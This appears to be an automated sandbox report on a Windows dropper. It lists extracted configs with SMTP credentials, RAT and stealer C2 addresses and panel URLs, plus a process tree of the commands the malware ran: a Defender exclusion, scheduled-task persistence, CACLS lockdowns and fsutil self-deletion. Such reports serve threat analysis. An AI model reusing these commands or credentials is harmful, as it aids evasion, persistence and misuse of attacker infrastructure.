Resubmissions
11-11-2023 08:23
231111-j96bfacf5s 1008-11-2023 14:52
231108-r8x8facc5z 1027-10-2023 03:52
231027-ee6lhabh8x 1027-10-2023 03:51
231027-ee1p9abh8s 1025-10-2023 10:35
231025-mm3htagf6y 1023-10-2023 09:11
231023-k5l8fahc84 1021-10-2023 11:53
231021-n2kf8aga32 1021-10-2023 11:26
231021-njywwsfg64 1020-10-2023 21:27
231020-1a8qysbe9t 10Analysis
-
max time kernel
1772s -
max time network
1826s -
platform
windows10-1703_x64 -
resource
win10-20231020-en -
resource tags
-
submitted
20-10-2023 21:27
General
-
Target
a.exe
-
Size
5KB
-
MD5
800a6337b0b38274efe64875d15f70c5
-
SHA1
6b0858c5f9a2e2b5980aac05749e3d6664a60870
-
SHA256
76a7490d3f1b0685f60a417d1c9cf96927b473825a914221f092f82ea112b571
-
SHA512
bf337140044a4674d69f7a2db30389e248593a99826c8731bc0a5ac71e46819eb539d8c7cbeab48108310359f5604e02e3bd64f17d9fdd380b574f329543645e
-
SSDEEP
48:6O/tGt28lK9iqmcfaFXfkeLJhyPFlWa8tYb/INV/cpwOulavTqXSfbNtm:j/IUiqtaJkeqDUt5xcpmsvNzNt
Malware Config
Extracted
Protocol: smtp- Host:
cp5ua.hyperhost.ua - Port:
587 - Username:
arinzelog@saonline.xyz - Password:
7213575aceACE@#$
Extracted
Protocol: smtp- Host:
mymobileorder.com - Port:
587 - Username:
money@mymobileorder.com - Password:
Grace@2023@121
Extracted
Protocol: smtp- Host:
mymobileorder.com - Port:
587 - Username:
grace@mymobileorder.com - Password:
Grace@20233
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.1
Default
127.0.0.1:4449
20.211.121.138:4449
udbyxlklndgyt
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
vidar
6.1
f02b730f81476e82205d9d2eb21e0ef8
https://steamcommunity.com/profiles/76561199563297648
https://t.me/twowheelfun
-
profile_id_v2
f02b730f81476e82205d9d2eb21e0ef8
-
user_agent
Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/605.1.15
Extracted
amadey
3.89
http://193.42.32.29/9bDc8sQ/index.php
-
install_dir
1ff8bec27e
-
install_file
nhdues.exe
-
strings_key
2efe1b48925e9abf268903d42284c46b
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
DcRat 47 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
XMRig Miner payload 3 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Async RAT payload 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Renames multiple (244) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 12 IoCs
-
Contacts a large (1300) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 10 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 13 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 13 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
VMProtect packed file 2 IoCs
Detects executables packed with VMProtect commercial packer.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 30 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 49 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 26 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 64 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 64 IoCs
-
Drops file in Program Files directory 34 IoCs
-
Drops file in Windows directory 26 IoCs
-
Launches sc.exe 50 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
-
Checks SCSI registry key(s) 3 TTPs 27 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 24 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 43 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 8 IoCs
-
Enumerates system info in registry 2 TTPs 22 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: MapViewOfSection 48 IoCs
-
Suspicious behavior: SetClipboardViewer 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 16 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\a.exe"C:\Users\Admin\AppData\Local\Temp\a.exe"2⤵
- DcRat
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe"C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\lopmeprores.exe"C:\Users\Admin\AppData\Local\Temp\a\lopmeprores.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c lophime.bat4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1sincebackgroundpro1.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1sincebackgroundpro1.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1sincebackgroundpro.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1sincebackgroundpro.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sincebackground.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sincebackground.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sincebackground.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sincebackground.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=5631 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sincebackground.exe" & erase "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sincebackground.exe" & exit8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /nobreak /t 39⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=5631 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sincebackground.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\siincebackground.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\siincebackground.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\reducerespond.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\reducerespond.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\reducerespond.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\reducerespond.exe6⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\a\ca.exe"C:\Users\Admin\AppData\Local\Temp\a\ca.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 7644⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "5⤵
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 26⤵
- Runs ping.exe
-
C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"6⤵
-
C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"7⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\a\msedge.exe"C:\Users\Admin\AppData\Local\Temp\a\msedge.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\shareu.exe"C:\Users\Admin\AppData\Local\Temp\a\shareu.exe"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a\start.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start.bat5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:createobject("wscript.shell").run("rathole client.toml",0)(window.close)6⤵
-
C:\Users\Admin\AppData\Local\Temp\a\rathole.exe"C:\Users\Admin\AppData\Local\Temp\a\rathole.exe" client.toml7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c nginx.bat5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:createobject("wscript.shell").run("nginx.exe",0)(window.close)6⤵
-
C:\Users\Admin\AppData\Local\Temp\a\nginx.exe"C:\Users\Admin\AppData\Local\Temp\a\nginx.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\nginx.exe"C:\Users\Admin\AppData\Local\Temp\a\nginx.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\fra.exe"C:\Users\Admin\AppData\Local\Temp\a\fra.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7644⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 13724⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\newumma.exe"C:\Users\Admin\AppData\Local\Temp\a\newumma.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe"C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe" /F5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\b24b726a24" /P "Admin:N"&&CACLS "..\b24b726a24" /P "Admin:R" /E&&Exit5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "Utsysc.exe" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "Utsysc.exe" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\b24b726a24" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\b24b726a24" /P "Admin:R" /E6⤵
-
C:\Users\Admin\AppData\Local\Temp\a\yes.exe"C:\Users\Admin\AppData\Local\Temp\a\yes.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"4⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "TCP Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD1D2.tmp"5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "TCP Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp6EEE.tmp"5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\QPrDpam.exe"4⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QPrDpam" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7630.tmp"4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"4⤵
- Accesses Microsoft Outlook profiles
-
C:\Users\Admin\AppData\Local\Temp\a\smss.exe"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\smss.exe"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\a\987123.exe"C:\Users\Admin\AppData\Local\Temp\a\987123.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\a\ch.exe"C:\Users\Admin\AppData\Local\Temp\a\ch.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Random.exe"C:\Users\Admin\AppData\Local\Temp\a\Random.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\ChNnmxKvrI4ThOfiCJfn1R3M.exe"C:\Users\Admin\Pictures\ChNnmxKvrI4ThOfiCJfn1R3M.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nhdues.exe" /P "Admin:N"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nhdues.exe" /P "Admin:R" /E8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\1ff8bec27e" /P "Admin:N"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\1ff8bec27e" /P "Admin:R" /E8⤵
-
C:\Users\Admin\Pictures\bHl1ub9I4fuFiy3awAZQFyHd.exe"C:\Users\Admin\Pictures\bHl1ub9I4fuFiy3awAZQFyHd.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SYSTEM32\cmd.execmd /c hime.bat6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1sisterorganizationpro1.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1sisterorganizationpro1.exe6⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1sisterorganizationpro.exeC:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1sisterorganizationpro.exe7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exeC:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exe8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exeC:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exeC:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exe9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=155135 "C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exe" & erase "C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exe" & exit10⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /nobreak /t 311⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=155135 "C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganization.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganiization.exeC:\Users\Admin\AppData\Local\Temp\IXP012.TMP\sisterorganiization.exe8⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\religiousexpertise.exeC:\Users\Admin\AppData\Local\Temp\IXP010.TMP\religiousexpertise.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\religiousexpertise.exeC:\Users\Admin\AppData\Local\Temp\IXP010.TMP\religiousexpertise.exe8⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Pictures\ANP4yWp92S2lJGa1UwxovMsI.exe"C:\Users\Admin\Pictures\ANP4yWp92S2lJGa1UwxovMsI.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\ANP4yWp92S2lJGa1UwxovMsI.exe"C:\Users\Admin\Pictures\ANP4yWp92S2lJGa1UwxovMsI.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\7KMUQgI2d6m3DlycfnTodJER.exe"C:\Users\Admin\Pictures\7KMUQgI2d6m3DlycfnTodJER.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\GVpK8bs08qR7iL7vb2C21qjF.exe"C:\Users\Admin\Pictures\GVpK8bs08qR7iL7vb2C21qjF.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\GVpK8bs08qR7iL7vb2C21qjF.exe"C:\Users\Admin\Pictures\GVpK8bs08qR7iL7vb2C21qjF.exe"6⤵
-
C:\Users\Admin\Pictures\RfL42Sr3EgTu26YbAp72lkqH.exe"C:\Users\Admin\Pictures\RfL42Sr3EgTu26YbAp72lkqH.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exe"C:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exe" --silent --allusers=05⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exeC:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x27c,0x2c0,0x6dd58538,0x6dd58548,0x6dd585546⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\DYpEz0d1hVzSFepQKeLM8aFr.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\DYpEz0d1hVzSFepQKeLM8aFr.exe" --version6⤵
-
C:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exe"C:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6012 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231020220229" --session-guid=6f041818-7650-4f1a-9f6b-49d86c1f553d --server-tracking-blob=ZGU2NzkxY2JiNzkzYThkOWNkZWE0YzYwYzU1ZGRmYmRiNjA1ZmY5OGI3MGFlNDEwMTU1OWZhMDUzZTUxMjdkYTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NzgzOTM0NC4xNjI3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJhOTliMDg5Zi1jMzI5LTRlNGEtOWUzYi1hOWI1NmU4MjlkYjQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=64040000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
